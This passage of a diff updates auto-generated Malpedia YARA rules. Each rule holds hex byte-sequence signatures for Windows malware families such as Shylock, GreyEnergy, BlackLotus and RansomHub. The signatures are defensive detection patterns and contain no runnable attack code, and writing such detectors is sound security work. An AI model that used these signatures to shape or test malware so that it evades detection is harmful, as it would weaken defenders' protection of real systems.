+		logic_hash = "a9799983d6a402fa0d92d4f2eccaf317bd81e0e8019f92bfd3f7e50ba619a3a3"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -107665,32 +107757,60 @@ rule MALPEDIA_Win_Glassrat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 56 53 8bf1 53 6a01 }
-		$sequence_1 = { 50 e8???????? 84c0 754b 6860ea0000 ff15???????? 8d8c242c010000 }
-		$sequence_2 = { f3a4 741a 6a02 50 ff15???????? 8b4d04 51 }
-		$sequence_3 = { 33c0 8b5504 8944241d 8d4c241c 89442421 c644241c00 89442425 }
-		$sequence_4 = { 84c0 7404 b001 eb1e }
-		$sequence_5 = { 50 51 ffd3 85c0 7e0a 2bf0 03f8 }
-		$sequence_6 = { 76cd b900080000 33c0 8dbdd8dfffff f3ab }
-		$sequence_7 = { ff15???????? 8b4e34 6a00 51 ffd7 8b4618 }
-		$sequence_8 = { f3a5 8bc8 33c0 83e103 c745fc00000000 f3a4 }
-		$sequence_9 = { 6a00 ff15???????? a1???????? 8b15???????? 8b0d???????? 89442408 }
+		$sequence_0 = { 8bc2 2d00040000 f7d8 1bc0 }
+		$sequence_1 = { 33c9 894808 894810 8910 c7400c01000000 894814 }
+		$sequence_2 = { 56 89442418 ff15???????? a820 }
+		$sequence_3 = { e8???????? 83c408 894604 03c5 }
+		$sequence_4 = { eb04 2bc8 8be9 53 50 }
+		$sequence_5 = { 8b460c 40 33d2 f77614 ff4610 }
+		$sequence_6 = { ff15???????? 81c600040000 50 56 ff15???????? }
+		$sequence_7 = { 8b5d0c 6bdb08 03c3 8b00 }
+		$sequence_8 = { 6a02 6a03 6a00 e8???????? }
+		$sequence_9 = { 6a02 ff15???????? 68???????? ff15???????? 6a00 6a00 6a00 }
+		$sequence_10 = { 68???????? ff15???????? 6a0a ff15???????? e9???????? }
+		$sequence_11 = { 8bf1 50 6801020000 c706???????? e8???????? }
+		$sequence_12 = { e8???????? 50 e8???????? 6a08 e8???????? }
+		$sequence_13 = { 7504 33d2 eb05 8b5608 2bd0 3bfa }
+		$sequence_14 = { 83b98c00000002 7504 33c9 eb03 8b4914 }
+		$sequence_15 = { 33c9 3bc8 1bd2 f7da 8915???????? }
+		$sequence_16 = { 894814 89481c c20400 56 8bf1 }
+		$sequence_17 = { 03c3 8b00 5b ffd0 }
+		$sequence_18 = { 80e108 0ac8 80c910 880e 8ac2 }
+		$sequence_19 = { 51 e8???????? 6a06 6a01 6a02 e8???????? }
+		$sequence_20 = { 8806 46 c1ea06 8816 46 }
+		$sequence_21 = { 8b01 ff5010 8b7614 ff4e0c 5e }
+		$sequence_22 = { 742e 85f6 7419 0fb6da f683c1d4001004 7406 8816 }
+		$sequence_23 = { 64a300000000 8bf9 8d7708 8bce }
+		$sequence_24 = { e8???????? 83c43c c21000 56 e8???????? }
+		$sequence_25 = { 6689bc5a80010000 83c30c 895c2424 e9???????? }
+		$sequence_26 = { 8d4c240c 8d542418 6a05 8944241c 51 }
+		$sequence_27 = { ff15???????? 8bc6 8b4c2434 64890d00000000 59 5f }
+		$sequence_28 = { 03c2 eb02 33c0 85ff }
+		$sequence_29 = { 8bf8 6a40 6800100000 57 6a00 ff15???????? 8d4df8 }
+		$sequence_30 = { c7470400000000 2504400080 5f 40 5e c3 5f }
+		$sequence_31 = { 7622 8b4558 83f805 7316 8a0b }
+		$sequence_32 = { 8b5c247c 55 56 8bb4248c000000 57 8b3b 8b2e }
+		$sequence_33 = { ff15???????? 015e18 57 83561c00 ff15???????? 5b }
+		$sequence_34 = { 8bf1 e8???????? 8be8 83c608 8bce }
+		$sequence_35 = { c3 b8???????? c705????????772b0010 a3???????? }
+		$sequence_36 = { ff15???????? 8bf8 6a40 6800100000 }
+		$sequence_37 = { 7548 8b4e0c 394f0c 7540 8b5748 807f040a }
 
 	condition:
-		7 of them and filesize < 81920
+		7 of them and filesize < 204800
 }
-rule MALPEDIA_Win_Bubblewrap_Auto : FILE
+rule MALPEDIA_Win_Shylock_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0adb22b2-c291-5da7-a49f-6252c3b1a007"
+		id = "357a8098-efc5-5a49-a18b-d4d668276421"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bubblewrap"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bubblewrap_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.shylock"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.shylock_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "0ab9a85f4803bb9809d1835ce4819efcd3e97bce18ea2653e803520f80f6784f"
+		logic_hash = "34460d345c77d949d300b4c007098ec528b095570601731f99128cb864a10989"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -107704,32 +107824,32 @@ rule MALPEDIA_Win_Bubblewrap_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bc8 83e103 f3a4 8d4c2418 51 55 e8???????? }
-		$sequence_1 = { a1???????? 8b15???????? 83c404 f3a5 8b0d???????? a3???????? }
-		$sequence_2 = { c3 b940000000 33c0 8dbc24a9000000 c68424a800000000 }
-		$sequence_3 = { 750b 5f 5e 5d 5b 81c4a0ba0400 c3 }
-		$sequence_4 = { 0bc2 49 79f0 89442458 33c0 }
-		$sequence_5 = { 83c408 50 57 8b3d???????? ffd7 68???????? }
-		$sequence_6 = { 5d 5b 81c4a0ba0400 c3 8b442410 8d4c2464 898424a4000000 }
-		$sequence_7 = { 83c404 eb37 a1???????? 8b35???????? 50 ffd6 }
-		$sequence_8 = { 0f8feffeffff 5b 8d4d02 b856555555 f7e9 8bc2 5f }
-		$sequence_9 = { 33d2 89742414 8d6ced00 89542418 }
+		$sequence_0 = { 50 b8???????? e8???????? 59 8bd8 51 54 }
+		$sequence_1 = { ffb0b0000000 ffb0ac000000 e8???????? 83c410 85c0 0f849a060000 833d????????01 }
+		$sequence_2 = { 8d85b0fdffff e8???????? 59 8b45fc 5f 5e 5b }
+		$sequence_3 = { 8d7318 e8???????? 8d7314 e8???????? 8d7310 e8???????? 8d730c }
+		$sequence_4 = { e8???????? 8d75e0 e8???????? 8d75ec e8???????? 8d75f4 e8???????? }
+		$sequence_5 = { 59 50 e8???????? 83c40c 8d75fc 8bf8 e8???????? }
+		$sequence_6 = { e9???????? 8b45f0 8d4de4 40 51 33d2 8d5df8 }
+		$sequence_7 = { e8???????? 59 833d????????00 74ef e9???????? 8b0d???????? 83b93401000001 }
+		$sequence_8 = { 8d75f0 e8???????? 8bc7 e8???????? 3c01 0f84d5020000 8d4dcc }
+		$sequence_9 = { 750a 6a01 8b7d88 e8???????? 0fb645e4 83f801 750a }
 
 	condition:
-		7 of them and filesize < 57136
+		7 of them and filesize < 630784
 }
-rule MALPEDIA_Win_Xdspy_Auto : FILE
+rule MALPEDIA_Win_Lobshot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e9ae860f-a2c7-565f-9217-a440882548d6"
+		id = "85b1eb24-9f05-55a3-8f6f-6e4c63293758"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xdspy"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.xdspy_auto.yar#L1-L172"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lobshot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.lobshot_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "1f709444cf724d3961e54f18b66ae4023548e4088934cac26da730f0bde271d9"
+		logic_hash = "18b4e7449b3d62631766d70c0d11905d5078e9b18e0b08eccb6d10a0123c3b2d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -107743,38 +107863,32 @@ rule MALPEDIA_Win_Xdspy_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d1c8d804e4100 8bf0 83e61f c1e606 8b0b }
-		$sequence_1 = { 59 59 68d0070000 68???????? }
-		$sequence_2 = { 50 897d80 e8???????? 83c418 8d45c4 50 }
-		$sequence_3 = { e8???????? ff35???????? 8d851cd1ffff 50 e8???????? }
-		$sequence_4 = { 53 e8???????? 59 59 3bc6 740e 50 }
-		$sequence_5 = { e8???????? 59 59 8945e0 85c0 7461 8d0cbd804e4100 }
-		$sequence_6 = { 56 e8???????? 83c414 ebc9 8bc8 c1f905 8d1c8d804e4100 }
-		$sequence_7 = { ebd0 8bc8 c1f905 8d3c8d804e4100 }
-		$sequence_8 = { 803073 ffc1 48ffc0 3bca 7cea 803d????????4d }
-		$sequence_9 = { 83fa0a 7d15 4863ca 0fb68419b01f0200 }
-		$sequence_10 = { eb03 488bc7 488b0d???????? 4533c9 41b888130000 498bd5 }
-		$sequence_11 = { 6642391c47 75f6 4c8bce ba02000000 488bcf ffd0 }
-		$sequence_12 = { 0fb78439c0160200 6683e847 6642890401 4883c102 4881f92c030000 7ce2 }
-		$sequence_13 = { fe08 488d4001 443838 75f5 488d85f0030000 4438bdf0030000 }
-		$sequence_14 = { 668935???????? 488b742438 66893d???????? 488b7c2440 668905???????? }
-		$sequence_15 = { 33c9 660f1f440000 420fb6843968a21700 88840dc0280000 488d4901 84c0 }
+		$sequence_0 = { 8b5c2414 8b35???????? 8d442448 50 57 ffd6 eb06 }
+		$sequence_1 = { ffd5 85c0 7429 6a00 ff35???????? 6a00 50 }
+		$sequence_2 = { fec0 5e 88411c 5b c3 56 8bf1 }
+		$sequence_3 = { 8bf9 895df8 8b430c 8945fc 8b7730 8b4734 3bf0 }
+		$sequence_4 = { ffd5 33c0 66898424c8020000 8d442470 50 8d8424cc020000 }
+		$sequence_5 = { 57 33ed 89542464 8d442458 c74424581e000000 50 }
+		$sequence_6 = { 8b5614 8b4e08 8a86b1160000 88040a b110 2a8eb4160000 8b45e4 }
+		$sequence_7 = { c744242400000000 ff15???????? 85c0 7520 6a04 8d442414 50 }
+		$sequence_8 = { 33f6 8b4dec 8bd9 834df8ff f7db 8b55e4 8b840538ffffff }
+		$sequence_9 = { 7405 48 85c0 7fe9 6683bc44bc0200002e 750a 33c9 }
 
 	condition:
-		7 of them and filesize < 3244032
+		7 of them and filesize < 247808
 }
-rule MALPEDIA_Win_Roll_Sling_Auto : FILE
+rule MALPEDIA_Win_Lunchmoney_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b7e33442-8180-54e6-9eaf-af122cb4c9a7"
+		id = "a8ab5f04-a830-5276-852a-dc32304e8dce"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.roll_sling"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.roll_sling_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lunchmoney"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.lunchmoney_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "9fbb0c1a994cbf47daa8ad072c8bc3b15bcfbdc43d87e63c5668a5130ba7c10c"
+		logic_hash = "6507a60182b28ed10fdd4ed1c7e21ccd1e2f0dc103e23e1d246a1843603fe4d9"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -107788,32 +107902,32 @@ rule MALPEDIA_Win_Roll_Sling_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 85c0 0f847ffdffff 488b17 488bca }
-		$sequence_1 = { 7417 488d05642e0100 483bc8 740b }
-		$sequence_2 = { 85c0 488b35???????? 480f4435???????? 4885f6 }
-		$sequence_3 = { ff15???????? 4c8b4308 4c89442440 488b03 83b88c00000000 0f8485000000 }
-		$sequence_4 = { 2bc2 e9???????? 8b5f20 4903d8 448b6724 4d03e0 418bf6 }
-		$sequence_5 = { 85c0 7429 448bc3 488d1521860000 498bce e8???????? 85c0 }
-		$sequence_6 = { eb05 b97e000000 ff15???????? 4533e4 488b742448 488b6c2440 488b7c2450 }
-		$sequence_7 = { 488bc2 488d0dbd150100 0f57c0 488d5308 48890b 488d4808 }
-		$sequence_8 = { 4c8bc7 ba92080000 488bcd ff15???????? 4c8d0c3b 4c8bc3 }
-		$sequence_9 = { 4d0bf0 458b4550 418bf8 f7df 4923fe }
+		$sequence_0 = { 83ec18 8bcf 54 e8???????? 8bce e8???????? 83ec18 }
+		$sequence_1 = { 8d0c00 894dec eb38 8b45f4 8b048550914200 8d4dec 6a00 }
+		$sequence_2 = { 6a01 8d4dbc e8???????? 8bb570ffffff 8dbb04010000 ba???????? 8bcf }
+		$sequence_3 = { 7202 8b09 8d55e4 e8???????? 8d4b24 8945d4 }
+		$sequence_4 = { 6a03 6a09 8d45bc 50 8d4b4c }
+		$sequence_5 = { 8bce 50 e8???????? 50 8d4da4 }
+		$sequence_6 = { 8bcf e8???????? 50 6a09 57 8bce }
+		$sequence_7 = { eb5a 56 e8???????? 59 8365fc00 8b049d50914200 }
+		$sequence_8 = { 33d2 8d4da4 385588 b800008000 0f45d0 837db808 52 }
+		$sequence_9 = { 8d86f8000000 83c124 3bc8 740a 6aff 6a00 50 }
 
 	condition:
-		7 of them and filesize < 299008
+		7 of them and filesize < 373760
 }
-rule MALPEDIA_Win_Sphijacker_Auto : FILE
+rule MALPEDIA_Win_Grey_Energy_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "209b4753-8fba-5f0f-8267-5050665ba5bc"
+		id = "2194ec68-6952-5855-89b8-1a483c36ceb6"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sphijacker"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sphijacker_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.grey_energy"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.grey_energy_auto.yar#L1-L162"
 		license_url = "N/A"
-		logic_hash = "a99b1a8ce4f2ca018676a9e46f28df0afb5f7a80b3caa10c6423eb9f11e6c670"
+		logic_hash = "6dd36b9cf8b9672a3513055fe48f5d646f4ed637cb72460d1965a0ebc0972231"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -107827,32 +107941,38 @@ rule MALPEDIA_Win_Sphijacker_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488bc3 4c8d3586ae0100 83e03f 488bf3 48c1ee06 488d3cc0 }
-		$sequence_1 = { ffc8 8bf8 0fb68c8282d80100 0fb6b48283d80100 33d2 488d1c8d00000000 }
-		$sequence_2 = { 4889442420 488d1527e00100 48c7c102000080 ff15???????? 488b4d18 4c8d4520 488d15fbe00100 }
-		$sequence_3 = { 740e 8bd0 488d0dd2e20100 e8???????? 488b442450 }
-		$sequence_4 = { 488bc3 b9209f0000 6666660f1f840000000000 8030ee 488d4005 4883e901 }
-		$sequence_5 = { 4c8bc3 488d8d34030000 898530030000 e8???????? 488d0d95ecfeff 48c1e602 0fb784b980d80100 }
-		$sequence_6 = { 41b93f000f00 4533c0 4889442420 488d154ddf0100 48c7c102000080 ff15???????? 488b4d18 }
-		$sequence_7 = { 488bce 0f1f4000 0f1f840000000000 0fb7440c6c 6639840d501c0000 }
-		$sequence_8 = { 4889742410 57 4c8bd2 488d359bd1feff }
-		$sequence_9 = { 660feb15???????? 660feb0d???????? 4c8d0dd4ac0000 f20f5cca f2410f590cc1 660f28d1 660f28c1 }
+		$sequence_0 = { 50 53 53 6800000008 57 }
+		$sequence_1 = { 8945d4 e8???????? 68???????? 8945d0 e8???????? }
+		$sequence_2 = { e8???????? 68???????? 8945cc e8???????? 68???????? 8945d4 e8???????? }
+		$sequence_3 = { 6800000008 57 53 53 }
+		$sequence_4 = { 8b4508 0345f0 0fbe08 8b45f0 }
+		$sequence_5 = { 8b45f0 8b4d08 0fb70c41 8b45f0 }
+		$sequence_6 = { eb14 8b45ec 8b4df8 8b55f0 }
+		$sequence_7 = { 8b45f8 0345ec 8808 eb10 }
+		$sequence_8 = { 7507 33c0 e9???????? c745f004000000 }
+		$sequence_9 = { 6a40 ff15???????? 8945f8 837df800 7507 33c0 }
+		$sequence_10 = { 8b4df8 8b55f0 8b7508 668b1456 }
+		$sequence_11 = { 75f9 53 ff15???????? 8b75f8 }
+		$sequence_12 = { 81e1ff000000 8b45ec 8b55f8 66890c42 eb14 8b45ec }
+		$sequence_13 = { 7407 c60100 41 48 75f9 ff75f8 }
+		$sequence_14 = { 742e 8d45f0 50 6a04 8d45f4 50 }
+		$sequence_15 = { 57 ff75e8 ff75f0 ffd6 85c0 0f84b8000000 ff75fc }
 
 	condition:
-		7 of them and filesize < 808960
+		7 of them and filesize < 303104
 }
-rule MALPEDIA_Win_Webc2_Qbp_Auto : FILE
+rule MALPEDIA_Win_Darkpink_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "fee8b4c8-beb4-5f15-8081-5f10952e51d6"
+		id = "b675ae58-304b-51cc-82c9-2d05a952daf3"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_qbp"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.webc2_qbp_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkpink"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.darkpink_auto.yar#L1-L116"
 		license_url = "N/A"
-		logic_hash = "257413d68538251f3adda377abdcb2ea5b8000f62907fcc22ea1c060ea83ae47"
+		logic_hash = "ae61fd7de2751bb38bc52ea4bef7ef6d5cc9562894ba78123146d52f1f8217ba"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -107866,32 +107986,32 @@ rule MALPEDIA_Win_Webc2_Qbp_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c20400 55 8bec 83ec08 894df8 8b4508 25ffff0000 }
-		$sequence_1 = { 51 8b4de4 e8???????? eb2b 8b55e4 0fbf8246100000 05fd000000 }
-		$sequence_2 = { 66898c504c520000 0fbf5508 0fbf45fc 8b4df8 8b75f8 668b945648100000 6689944148100000 }
-		$sequence_3 = { eb2b 8b55e4 0fbf8246100000 05fd000000 50 8b4de4 }
-		$sequence_4 = { 83c001 50 8b8d486cffff 51 }
-		$sequence_5 = { 83bdf46affff00 7504 33c0 eb57 8b85f46affff }
-		$sequence_6 = { 837d0800 740e 837d0c00 7408 8b45f4 }
-		$sequence_7 = { 894df8 c745fc00000000 6a01 8d45fc 50 8b4df8 e8???????? }
-		$sequence_8 = { ff15???????? 8945e4 837de4ff 7511 8b4de8 51 ff15???????? }
-		$sequence_9 = { 8b95e8fdffff 52 e8???????? 83c404 8985f0feffff c745fc00000000 c685f8feffff00 }
+		$sequence_0 = { 0f8579010000 8b35???????? 68a6000000 68???????? 6a01 50 }
+		$sequence_1 = { ffd3 85c0 7530 6a32 }
+		$sequence_2 = { c1f806 6bc938 8b0485f09d4100 0fb6440828 83e040 5d }
+		$sequence_3 = { c745e4a8604100 eb07 c745e494604100 8b4508 }
+		$sequence_4 = { 8b04bdf09d4100 ff743018 ff15???????? 85c0 7404 }
+		$sequence_5 = { 56 57 e8???????? 57 68???????? 53 }
+		$sequence_6 = { 85f6 7420 6bc618 57 8db8f09b4100 }
+		$sequence_7 = { 83e03f c1f906 6bd038 8b45fc 03148df09d4100 }
+		$sequence_8 = { 83e73f c1f906 6bd738 8b0c8df09d4100 c644112800 }
+		$sequence_9 = { 8bcf 83e03f c1f906 6bd038 8b45fc 03148df09d4100 }
 
 	condition:
-		7 of them and filesize < 630784
+		7 of them and filesize < 237568
 }
-rule MALPEDIA_Win_Observer_Stealer_Auto : FILE
+rule MALPEDIA_Win_Victorygate_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "24de6ab1-f92f-5eeb-9448-e6d3e6bd0612"
+		id = "967fc783-d9bc-5b76-9b75-3a087d6a66b4"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.observer_stealer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.observer_stealer_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.victorygate"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.victorygate_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "408c29e400138ccd9118763d2259592c2d4bc7c8429c89ee21feadbbd649bc7c"
+		logic_hash = "427b2d98b9c3c2aa99b815ff597c75e43d477300e8035fd3554b7df3486b4eb0"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -107905,32 +108025,32 @@ rule MALPEDIA_Win_Observer_Stealer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 3b742420 7412 8bce e8???????? 6a18 58 03f0 }
-		$sequence_1 = { 5d 5b 81c490000000 c24c00 81ecb8000000 83bc24d400000008 }
-		$sequence_2 = { e8???????? ff36 8d4c243c e8???????? 8d442420 50 8d44241c }
-		$sequence_3 = { 53 55 56 57 83ec18 8d8424b8010000 8bf1 }
-		$sequence_4 = { e8???????? cc 8b442408 8b4c2404 830023 8b01 8b50fc }
-		$sequence_5 = { 59 b201 8d4c244c e8???????? 83c430 8d4c2460 e8???????? }
-		$sequence_6 = { ab ab ab ab 33c0 895a70 8d7a78 }
-		$sequence_7 = { 53 ff15???????? 837c243808 8d442424 0f43442424 50 ff15???????? }
-		$sequence_8 = { 8b9044044400 85d2 75cd 5f c1e604 399e44044400 7407 }
-		$sequence_9 = { 50 8d4c241c e8???????? 8d8c24e0000000 8b00 03c5 50 }
+		$sequence_0 = { 009bb3410050 ba410050ba 41 0050ba 41 0050ba 41 }
+		$sequence_1 = { c745e800000000 c745ec0f000000 c645d800 e8???????? 57 51 8d45d8 }
+		$sequence_2 = { 745c 5f 5b c60000 33c0 5e }
+		$sequence_3 = { 85c0 740d 50 e8???????? 83c404 8bf8 eb21 }
+		$sequence_4 = { c1fa04 8bf2 c1ee1f 03f2 f7e9 c1fa04 8bc2 }
+		$sequence_5 = { 8b460c 8d7e0c 85c0 7556 8bce e8???????? 85c0 }
+		$sequence_6 = { 680c2b0000 68???????? 68???????? ff15???????? 8b0d???????? 6a00 6a02 }
+		$sequence_7 = { e8???????? 8d55f0 8bc8 e8???????? 8b45f0 c645fc01 8b55e8 }
+		$sequence_8 = { 8d86e0010000 6a36 50 ff15???????? 85c0 0f850b070000 ff75f8 }
+		$sequence_9 = { ff15???????? 85c0 0f852b010000 ff75f8 8d8688020000 6a5b 50 }
 
 	condition:
-		7 of them and filesize < 614400
+		7 of them and filesize < 1209344
 }
-rule MALPEDIA_Win_Torrentlocker_Auto : FILE
+rule MALPEDIA_Win_Blacklotus_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "78a2f41d-b3cc-50c3-94fa-009892ee7a43"
+		id = "84ef9a0b-6544-5450-8b66-292ec2ba5dbd"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.torrentlocker"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.torrentlocker_auto.yar#L1-L169"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.blacklotus"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.blacklotus_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "3dd062623227a3c969fbf6874bc33a690192fa1b5ef820c50984975d7d603139"
+		logic_hash = "94ccc2d7ff61cb6463b78893aadb2549c584433629bcbab33ca8298790f40cde"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -107944,79 +108064,73 @@ rule MALPEDIA_Win_Torrentlocker_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c3 83f801 7405 83f802 }
-		$sequence_1 = { 85c0 753c 68???????? b8???????? bb???????? e8???????? }
-		$sequence_2 = { 750b 68???????? ff15???????? 8bc3 }
-		$sequence_3 = { 8b0d???????? 50 6a00 51 ff15???????? 8bf0 }
-		$sequence_4 = { 6a00 68???????? ffd6 83f801 7502 5e c3 }
-		$sequence_5 = { 6a02 e8???????? 83c430 85c0 }
-		$sequence_6 = { 8bc6 5e 5f c3 be02000000 }
-		$sequence_7 = { 68???????? ffd6 85c0 751f ff15???????? 3d16000980 753d }
-		$sequence_8 = { 7415 50 a1???????? 56 }
-		$sequence_9 = { 83ec0c 56 8b35???????? 57 6a14 6a08 50 }
-		$sequence_10 = { 741d 8b15???????? 50 6a00 52 ff15???????? 8bc7 }
-		$sequence_11 = { 7526 68400000f0 50 6a00 }
-		$sequence_12 = { 50 ff15???????? 85c0 8d4601 7502 8bc6 5e }
-		$sequence_13 = { 7412 83c8ff 5f a3???????? 89460c }
-		$sequence_14 = { 68???????? ff15???????? 85c0 7510 6a78 50 }
-		$sequence_15 = { 6a78 50 68???????? e8???????? }
+		$sequence_0 = { 443bca 7319 69c03f000100 4883c102 4103c0 41ffc1 440fb701 }
+		$sequence_1 = { c745cfc1afbd03 c745d301138a6b c745d73a911141 c745db4f67dcea c745df97f2cfce }
+		$sequence_2 = { 448bc6 488d155b1d0000 488bcb e8???????? 488bf0 }
+		$sequence_3 = { 770b 418b4908 03ca 413bcb 770e 6641ffc2 4983c128 }
+		$sequence_4 = { 42883c10 4183fb3c 0f8c45ffffff 498d8af0000000 41b810000000 498bd6 }
+		$sequence_5 = { 488d1588f7ffff e8???????? 488b05???????? 488bcb ff5020 488b5c2430 488b742438 }
+		$sequence_6 = { 4632440c30 eb1b 418af1 83f804 }
+		$sequence_7 = { 4889442428 4c8bc5 488bd3 48897c2420 }
+		$sequence_8 = { 740b 4883c602 483bf7 72bd eb0c bb03000000 eb05 }
+		$sequence_9 = { 48897010 48897818 4c897020 55 488d68c8 4881ec30010000 4c8bd1 }
 
 	condition:
-		7 of them and filesize < 933888
+		7 of them and filesize < 181248
 }
-rule MALPEDIA_Win_Ransomhub_Auto : FILE
+rule MALPEDIA_Win_Onliner_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "16824eb2-4ba0-577a-a551-4908aad55778"
-		date = "2024-10-31"
-		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ransomhub"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ransomhub_auto.yar#L1-L134"
+		id = "c0a25174-badc-5a1b-a67c-48cbb1aef2be"
+		date = "2023-12-06"
+		modified = "2023-12-08"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.onliner"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.onliner_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "f4a09a2e3b131a855ce4ab14c5a239317d5e0fe3c9ee416c213d5fc3f65e7c00"
+		logic_hash = "6df36365f1b8dbe7cdb1d0b03d64f7da847c99d2518d7b5ebc1610f68ca3a069"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20241030"
-		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
-		malpedia_version = "20241030"
+		malpedia_rule_date = "20231130"
+		malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351"
+		malpedia_version = "20230808"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 833d????????00 7509 48898780010000 eb15 488db780010000 4889f9 4889f7 }
-		$sequence_1 = { bf01000000 488d353b5f1c00 e8???????? 488b7c2458 48894f10 833d????????00 7506 }
-		$sequence_2 = { 4939da 740d 4c89d0 b930000000 e8???????? 31c0 31db }
